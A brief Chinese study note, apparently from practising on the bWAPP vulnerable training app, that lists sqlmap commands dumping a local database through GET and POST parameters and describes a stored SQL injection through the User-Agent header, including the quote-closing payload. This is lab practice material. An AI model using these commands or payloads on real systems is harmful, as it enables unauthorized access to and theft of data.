bwapp 随笔

SQL Injection (GET/Search)

C:\Python27\sqlmap>python sqlmap.py  -u  "http://localhost/bwapp/sqli_1.php?titl

e=sfsdf&action=search"  --cookie="PHPSESSID=k60mg7l865e7l5jrp9gr8l6c84;security_

level=0" --dbms=mysql  --batch  -D bwapp -T movies -C "title,id" --dump

sql  post

C:\Python27\sqlmap>python sqlmap.py  -u  "http://localhost/bwapp/sqli_6.php"  --
data="title=sdfsdf&action=search"  --cookie="PHPSESSID=k60mg7l865e7l5jrp9gr8l6c8
4;security_level=0" --dbms=mysql    --batch --current-db

SQL Injection (AJAX/JSON/jQuery)-- 待分析  。

====================================================

SQL Injection - Stored (User-Agent)

可以看出是用的ua 字段。 通过bs 修改ua 可以看出修改的结果。 

然后将ua 修改为 ‘  ，出现错误， 出现注入点。 

修改  为  ', 'sdfsdf')#  ok  

修改 第二个参数为  select 语句，得到注入结果。